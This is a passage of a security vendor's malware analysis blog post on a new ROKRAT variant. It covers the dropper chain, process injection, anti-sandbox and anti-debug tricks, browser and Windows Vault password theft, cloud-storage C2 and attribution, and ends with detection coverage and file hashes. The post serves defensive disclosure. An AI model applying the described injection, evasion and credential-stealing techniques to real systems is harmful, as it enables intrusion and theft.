bytes<br />binaryStream.SaveToFile file, 1<br />End Sub<br /></pre>The purpose is to decode, using the base64 algorithm, the content of the strEncode variable. The decoded data is stored in the c:\\ProgramData\\HncModuleUpdate.exe file and executed. The binary is the ROKRAT dropper. The specific filename 'HncModuleUpdate' may fool a user into thinking this is a Hancom software.<br /><br /><h2 id=\"h.kx21mld8n9je\">Stage 1: Dropper</h2><br />The purpose of the dropper is to extract the resource named SBS. This resource contains malicious shellcode. Additionally, the dropper executes a new cmd.exe process, injects the extracted resource and executes it. The code injection is performed by the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() APIs:<br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-UK3O08XFp2k/WhyBximnWLI/AAAAAAAAAMc/s5N3fKQB__ks4xpcTOH6GtWfOMVzQS_TwCLcBGAs/s1600/image6.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"932\" data-original-width=\"740\" height=\"640\" src=\"https://4.bp.blogspot.com/-UK3O08XFp2k/WhyBximnWLI/AAAAAAAAAMc/s5N3fKQB__ks4xpcTOH6GtWfOMVzQS_TwCLcBGAs/s640/image6.png\" width=\"508\" /></a></div><br />Once executed, the shellcode will decoded a PE file, will load it in the memory of cmd.exe and finally will execute it. This payload is a new variant of ROKRAT.<br /><br />Additionally, one of the analysed droppers displays a picture to the user:<br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-UdRh6pJR0FU/WhyB6um-i6I/AAAAAAAAAMg/Rujz_rpXM8AIMWxHayfmA7v0sdKxbxYawCLcBGAs/s1600/image20.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"765\" data-original-width=\"865\" height=\"353\" src=\"https://2.bp.blogspot.com/-UdRh6pJR0FU/WhyB6um-i6I/AAAAAAAAAMg/Rujz_rpXM8AIMWxHayfmA7v0sdKxbxYawCLcBGAs/s400/image20.png\" width=\"400\" /></a></div><br />The people in the pictures are about the Korean war and people related to independence troops during the \"independence movement\". The image on the top left comes from <a href=\"https://ko.wikipedia.org/wiki/%EB%B0%B1%EC%84%A0%EC%97%BD\">Wikipedia</a>. The picture in the middle left comes from <a href=\"http://m.blog.daum.net/_blog/_m/articleView.do?blogid=0UCYA&articleno=1545\">this blog</a>. And the bottom left image comes from this <a href=\"http://m.ohmynews.com/NWS_Web/Mobile/at_pg.aspx?CNTN_CD=A0000939170#cb\">news website</a>. The decoy image seems to be a set of public pictures.<br /><br /><h2 id=\"h.wf5zmxoij2lr\">Stage 2: ROKRAT</h2><h3 id=\"h.c571fjfldgt2\">Similarities With the \"Evil New Years\" MalDoc</h3><br />This variant of ROKRAT contains similar code with the \"Evil New Years\" downloader. The information collected during the reconnaissance phase is similar. The malware uses the following registry key to get the machine type: HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData. The \"System manufacturer\" value is used to identify the type of machine. Here is the graph flow of the \"Evil New Years\" downloader:<br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-ThSGoJ2fiL8/WhyCFM6M3SI/AAAAAAAAAMo/kS5m9vVHIhUAhkMPEhb-YiPH5-WISQ0hgCLcBGAs/s1600/image10.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"705\" data-original-width=\"995\" height=\"452\" src=\"https://4.bp.blogspot.com/-ThSGoJ2fiL8/WhyCFM6M3SI/AAAAAAAAAMo/kS5m9vVHIhUAhkMPEhb-YiPH5-WISQ0hgCLcBGAs/s640/image10.png\" width=\"640\" /></a></div><br />The graph flow of the ROKRAT variant:<br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-sshO1piH2Z4/WhyCKaO_YUI/AAAAAAAAAMs/T-ioks5MAWQP9yqvUiBKHLO88h3IIGBQgCLcBGAs/s1600/image13.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"703\" data-original-width=\"999\" height=\"450\" src=\"https://2.bp.blogspot.com/-sshO1piH2Z4/WhyCKaO_YUI/AAAAAAAAAMs/T-ioks5MAWQP9yqvUiBKHLO88h3IIGBQgCLcBGAs/s640/image13.png\" width=\"640\" /></a></div><br />The graph flows are 99% similar. Additionally, the machine type is described with the following strings:<br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-P3vttCd3--8/WhyCQUU2stI/AAAAAAAAAMw/yqLRBtpi1DUNwbOJ8WiPWn9nC3rtishggCLcBGAs/s1600/image8.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"189\" data-original-width=\"476\" height=\"254\" src=\"https://4.bp.blogspot.com/-P3vttCd3--8/WhyCQUU2stI/AAAAAAAAAMw/yqLRBtpi1DUNwbOJ8WiPWn9nC3rtishggCLcBGAs/s640/image8.png\" width=\"640\" /></a></div><br />The code appears to be based on this <a href=\"http://www.rohitab.com/discuss/topic/35915-win32-api-to-get-system-information/?p%3D10075283\">forum</a> post describing the use of the Win32 APIs used. The source code only considers the following type:<br /><pre>default: lpString = \"(Other)\"; break;<br />case 0x02: lpString = \"(Unknown)\"; break;<br />case 0x03: lpString = \"(Desktop)\"; break;<br />case 0x04: lpString = \"(Low Profile Desktop)\"; break;<br />case 0x06: lpString = \"(Mini Tower)\"; break;<br />case 0x07: lpString = \"(Tower)\"; break;<br />case 0x08: lpString = \"(Portable)\"; break;<br />case 0x09: lpString = \"(Laptop)\"; break;<br />case 0x0A: lpString = \"(Notebook)\"; break;<br />case 0x0E: lpString = \"(Sub Notebook)\"; break;<br /></pre>Notice the () used by the ROKRAT author too. Some values are ignored as we can see from the <a href=\"http://www.dmtf.org/sites/default/files/standards/documents/DSP0134_2.7.0.pdf\">SMBIOS documentation</a>:<br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-0Ere0jsIaBM/WhyCWDThHsI/AAAAAAAAAM0/hGb9Yd4MiZ85bo8q1mlGuZ8VzRrFI690wCLcBGAs/s1600/image19.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"861\" data-original-width=\"645\" height=\"640\" src=\"https://2.bp.blogspot.com/-0Ere0jsIaBM/WhyCWDThHsI/AAAAAAAAAM0/hGb9Yd4MiZ85bo8q1mlGuZ8VzRrFI690wCLcBGAs/s640/image19.png\" width=\"478\" /></a></div><br />The missing values are also omitted from the forum post.<br /><br />Another similarity is the PDB path. The \"Evil New Year\" sample contained the following PDB path: <br /><ul><li><pre>e:\\Happy\\Work\\Source\\version 12\\T+M\\Result\\DocPrint.pdb</pre></li></ul>This new ROKRAT variant contains the following PDB:<br /><ul><li><pre>d:\\HighSchool\\version 13\\2ndBD\\T+M\\T+M\\Result\\DocPrint.pdb</pre></li></ul>We clearly have the similar pattern.<br /><h3 id=\"h.4oudy5rvmx9b\">Anti-Sandbox</h3><br />This ROKRAT variant contain anti-sandbox tricks. This is performed by checking if the following libraries are loaded:<br /><br /><ul><li>SbieDll.dll (sandboxie library)</li><li>Dbghelp.dll (Microsoft debugging tools)</li><li>Api_log.dll (threatAnalyzer / GFI SandBox)</li><li>Dir_watch.dll (threatAnalyzer / GFI SandBox)</li></ul><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-tMpcUMOjVY4/WhyCeLjiTtI/AAAAAAAAAM4/55qQDK6rByglGRQeSmTpw6kLM3ksCkJ9QCLcBGAs/s1600/image4.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"668\" data-original-width=\"1142\" height=\"374\" src=\"https://3.bp.blogspot.com/-tMpcUMOjVY4/WhyCeLjiTtI/AAAAAAAAAM4/55qQDK6rByglGRQeSmTpw6kLM3ksCkJ9QCLcBGAs/s640/image4.png\" width=\"640\" /></a></div><h3 id=\"h.v1caqmjuebfo\">Anti-Debug</h3><br />This ROKRAT version contains anti-debug tricks. For example it uses the following NOP technique:<br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/--2thdwNFFWk/WhyCxluop1I/AAAAAAAAANA/ZvScFYWEfmEX8V0XKU8Ab3e6RR9Nl3vFACLcBGAs/s1600/image5.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"498\" data-original-width=\"727\" height=\"438\" src=\"https://2.bp.blogspot.com/--2thdwNFFWk/WhyCxluop1I/AAAAAAAAANA/ZvScFYWEfmEX8V0XKU8Ab3e6RR9Nl3vFACLcBGAs/s640/image5.png\" width=\"640\" /></a></div><br />nop dword ptr [eax+eax+00h] is a 5 bytes NOP: 0x0F1F440000. But this opcode is not correctly supported by Immunity Debugger, the assembly is replaced by \"???\" in red in the screenshot:<br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://1.bp.blogspot.com/-FOQkjTQlNvA/WhyC3zsnVTI/AAAAAAAAANE/WmpI7gwqSBM75SG_ls-3cHjVzcKC50JTgCLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"345\" data-original-width=\"684\" height=\"322\" src=\"https://1.bp.blogspot.com/-FOQkjTQlNvA/WhyC3zsnVTI/AAAAAAAAANE/WmpI7gwqSBM75SG_ls-3cHjVzcKC50JTgCLcBGAs/s640/image2.png\" width=\"640\" /></a></div><h3 id=\"h.nuvmlbdrfycg\">Screenshots Feature</h3><br />The two ROKRAT versions performed screenshots. It's interesting to note similarities between the two versions. Especially the filename of the saved screenshot, here is the April ROKRAT version:<br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-9U3juJSttOw/WhyC_xXCS7I/AAAAAAAAANI/QFDm3a7rfxQcmAM_ly8YHcSBuD4WW6FegCLcBGAs/s1600/image17.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"863\" data-original-width=\"659\" height=\"640\" src=\"https://2.bp.blogspot.com/-9U3juJSttOw/WhyC_xXCS7I/AAAAAAAAANI/QFDm3a7rfxQcmAM_ly8YHcSBuD4WW6FegCLcBGAs/s640/image17.png\" width=\"488\" /></a></div><br />And the code of the November version:<br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://1.bp.blogspot.com/--n6yXqONkEs/WhyDFe5MlnI/AAAAAAAAANM/3XsNWR3OdBUI3VK6FQLIhAGsopYx4WT5ACLcBGAs/s1600/image11.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"744\" data-original-width=\"810\" height=\"586\" src=\"https://1.bp.blogspot.com/--n6yXqONkEs/WhyDFe5MlnI/AAAAAAAAANM/3XsNWR3OdBUI3VK6FQLIhAGsopYx4WT5ACLcBGAs/s640/image11.png\" width=\"640\" /></a></div><br />The pattern is exactly the same: %s%04X%04X.tmp. The two %04X are random values. And the %s contains a temporary path (obtained with GetTempPath()). In both sample, the string length is 0x12C (300). This part is clearly a copy-paste.<br /><h3 id=\"h.kg3288afhmp8\">Browser Password Stealer</h3><br />One of the analysed November ROKRAT samples contained a browser stealing capability. The malware is able to extract the stored passwords from Internet Explorer, Chrome and Firefox. For Chrome and Firefox, the malware queries the sqlite database containing the URL, username and password:<br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-1c4E_cI5198/WhyDL5Xq05I/AAAAAAAAANQ/pkyAlBQDvAgq3n9AX1XpGuRd8uLEQhbVACLcBGAs/s1600/image3.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"383\" data-original-width=\"884\" height=\"276\" src=\"https://2.bp.blogspot.com/-1c4E_cI5198/WhyDL5Xq05I/AAAAAAAAANQ/pkyAlBQDvAgq3n9AX1XpGuRd8uLEQhbVACLcBGAs/s640/image3.png\" width=\"640\" /></a></div><br />Additionally, ROKRAT supports the Microsoft Vault mechanism. Vault was implemented in Windows 7, it contains any sensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs:<br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-kgM45XXgNKw/WhyDSVHJD5I/AAAAAAAAANY/y18ZaMeY3XAiJJt0c2qUT88YUc-HQfPtACLcBGAs/s1600/image14.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"728\" data-original-width=\"446\" height=\"640\" src=\"https://2.bp.blogspot.com/-kgM45XXgNKw/WhyDSVHJD5I/AAAAAAAAANY/y18ZaMeY3XAiJJt0c2qUT88YUc-HQfPtACLcBGAs/s640/image14.png\" width=\"390\" /></a></div><br />The ROKRAT implementation is largely based on the <a href=\"https://www.codeproject.com/Articles/1167943/The-Secrets-of-Internet-Explorer-Credentials\">following project</a>. This is a change of tactic for ROKRAT when compared with previous samples/versions. This time the actor is specifically targeting information which would be used for additional compromises and maybe even on potential personal accounts. The method used by the ROKRAT actors was also out of the ordinary as they embedded the whole SQLite library into their executable to allow the SQLite browsing attempts used for Firefox & Google Chrome.<br /><br />During our investigation, we discovered that the browser password stealer code is exactly the same as the code used during the <a href=\"https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/\">FreeMilk</a> campaign described by Unit 42. In this article, the author already noticed C2 infrastructure overlap between FreeMilk and ROKRAT. In addition, we can add that some code overlap is present between the 2 samples:<br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://1.bp.blogspot.com/-wgeOLIL7OBQ/WhyDX-7egxI/AAAAAAAAANc/bj86udF7beAhD0Q3kWPDDLsJPNjWn-FBwCLcBGAs/s1600/image12.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"960\" data-original-width=\"1504\" height=\"408\" src=\"https://1.bp.blogspot.com/-wgeOLIL7OBQ/WhyDX-7egxI/AAAAAAAAANc/bj86udF7beAhD0Q3kWPDDLsJPNjWn-FBwCLcBGAs/s640/image12.png\" width=\"640\" /></a></div><br />On the left, we have the ROKRAT sample and on the right the FreeMilk sample. We can notice that in addition to the code, the author copy-pasted English typos such as \"IE Registery\".<br /><h3 id=\"h.xczovqmmm9yy\">Cloud Platforms Used As C&C</h3><br />Finally, this ROKRAT version uses cloud platforms in exactly the same way as our previous analysis. This time, the author did not use social network platforms, but different cloud providers:<br /><br /><ul><li><div class=\"separator\" style=\"clear: both; text-align: center;\"></div><h4 id=\"h.xh482qf6mdeh\">pcloud</h4></li></ul><ul></ul><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-PrgljjxiAFo/WhyEcoSdFdI/AAAAAAAAAN4/bdK6iwGJ8moRLm9NDzv_5CVZx82QlV0NQCLcBGAs/s1600/image18.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"624\" data-original-width=\"537\" height=\"640\" src=\"https://3.bp.blogspot.com/-PrgljjxiAFo/WhyEcoSdFdI/AAAAAAAAAN4/bdK6iwGJ8moRLm9NDzv_5CVZx82QlV0NQCLcBGAs/s640/image18.png\" width=\"550\" /></a></div><br /><br /><ul><li><h4 id=\"h.sdcw9y4wifxc\">Box</h4></li></ul><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://1.bp.blogspot.com/-mEPlwuN1nzk/WhyEywpiFYI/AAAAAAAAAOA/WJFSGK8Ylp8IQE6Vru-WMQWd57IGHsBkwCLcBGAs/s1600/image15.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"272\" data-original-width=\"590\" height=\"294\" src=\"https://1.bp.blogspot.com/-mEPlwuN1nzk/WhyEywpiFYI/AAAAAAAAAOA/WJFSGK8Ylp8IQE6Vru-WMQWd57IGHsBkwCLcBGAs/s640/image15.png\" width=\"640\" /></a></div><div><br /></div><ul><li><h4 id=\"h.toutdls5ikao\">Dropbox</h4></li></ul><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-DFU-dyBrdNg/WhyFAJdvf6I/AAAAAAAAAOM/oP6_ri4qfBQZa3-1tuSvysODAQyRZT73gCLcBGAs/s1600/image9.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"406\" data-original-width=\"567\" height=\"458\" src=\"https://3.bp.blogspot.com/-DFU-dyBrdNg/WhyFAJdvf6I/AAAAAAAAAOM/oP6_ri4qfBQZa3-1tuSvysODAQyRZT73gCLcBGAs/s640/image9.png\" width=\"640\" /></a></div><ul><li><h4 id=\"h.vwluo9xq9uhs\">Yandex</h4></li></ul><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-obpjJED7PA8/WhyFL04Jk0I/AAAAAAAAAOQ/5c1siYoQcdAt8UgR9YIuTXiawtZlN1DhACLcBGAs/s1600/image16.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"249\" data-original-width=\"577\" height=\"276\" src=\"https://4.bp.blogspot.com/-obpjJED7PA8/WhyFL04Jk0I/AAAAAAAAAOQ/5c1siYoQcdAt8UgR9YIuTXiawtZlN1DhACLcBGAs/s640/image16.png\" width=\"640\" /></a></div><div><br /></div><h2 id=\"h.x0mbglid6xf5\">Conclusion</h2><br />This campaign shows that the actor behind ROKRAT is still active. Based on the PDB, it could be the 13th version of this malware. This actor made the decision only to use legitimate cloud platforms, but changed some from the last incarnation. From an attacker's perspective it's an interesting choice, the flow is encrypted by default with HTTPS and the malicious flow can be difficult to find in the middle of legitimate traffic to these platforms. We can also determine that the actor likes to use code already available on the internet in various repositories we mentioned throughout this post ie; GitHub, Code Project and other public forums.<br /><br />Based on source code copy-paste, we remain highly confident that the author of ROKRAT is also behind, or working with those behind, the FreeMilk spear phishing campaign. This is further proven by the fact that ROKRAT shares code with Freenki downloader used in the FreeMilk campaign.<br /><br />Moreover, the actor is always interested by the same pattern of targets, the decoy documents refer to precise elements related to the geopolitical situation between North and South Korea. Generally, the documents reference the Ministry of Unification or the situation of North Korean citizens. They frequently contain specific references to real meetings or conferences, showing a high knowledge of current events in North and South Korea.<br /><br />Together this information helps us to understand the profile of the targeted systems and the interests of the threat actor.<br /><br /><h2 id=\"h.n2mz0vhntu4k\">Coverage</h2><br />Additional ways our customers can detect and block this threat are listed below.<br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-h3Ubgz2tpKo/WhyDpf-abzI/AAAAAAAAANk/QXJs9157NFcro7ZHWf36KsfFiQ2yjgazgCLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"268\" data-original-width=\"320\" src=\"https://3.bp.blogspot.com/-h3Ubgz2tpKo/WhyDpf-abzI/AAAAAAAAANk/QXJs9157NFcro7ZHWf36KsfFiQ2yjgazgCLcBGAs/s1600/image1.png\" /></a></div>Advanced Malware Protection (<a href=\"https://www.cisco.com/c/en/us/products/security/advanced-malware-protection\">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br /><a href=\"https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html\">CWS</a> or<a href=\"https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html\"> WSA</a> web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br /><a href=\"https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html\">Email Security</a> can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as<a href=\"https://www.cisco.com/c/en/us/products/security/firewalls/index.html\"> </a><a href=\"https://www.cisco.com/c/en/us/products/security/firewalls/index.html\">NGFW</a>,<a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\"> </a><a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and<a href=\"https://meraki.cisco.com/products/appliances\"> </a><a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href=\"https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html\">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href=\"https://umbrella.cisco.com/\">Umbrella</a>, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.<br /><br />Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=\"https://www.snort.org/products\">Snort.org</a>.<br /><br /><h2 id=\"h.kn6j2twaeqyv\">IOCs</h2><br />Path: c:\\ProgramData\\HncModuleUpdate.exe<br />MalDoc: 171e26822421f7ed2e34cc092eaeba8a504b5d576c7fd54aa6975c2e2db0f824<br />Dropper #1: a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037<br />Dropper #2: eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14<br />Dropper #3: 9b383ebc1c592d5556fec9d513223d4f99a5061591671db560faf742dd68493f<br />ROKRAT: b3de3f9309b2f320738772353eb724a0782a1fc2c912483c036c303389307e2e<br />Freenki: 99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=fAmkhLaUPK8:-FWTXT_BreY:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/fAmkhLaUPK8\" height=\"1\" width=\"1\" alt=\"\"/>", "lastseen": "2017-12-25T17:52:13", "enchantments_done": [], "reporter": "noreply@blogger.com (Paul Rascagneres)", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/fAmkhLaUPK8/ROKRAT-Reloaded.html", "modified": "2017-11-28T21:37:03", "title": "ROKRAT Reloaded", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "viewCount": 14, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "blog", "references": [], "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}, "published": "2017-11-27T21:52:00", "_object_type": "robots.models.rss.RssBulletin", "objectVersion": "1.4"}
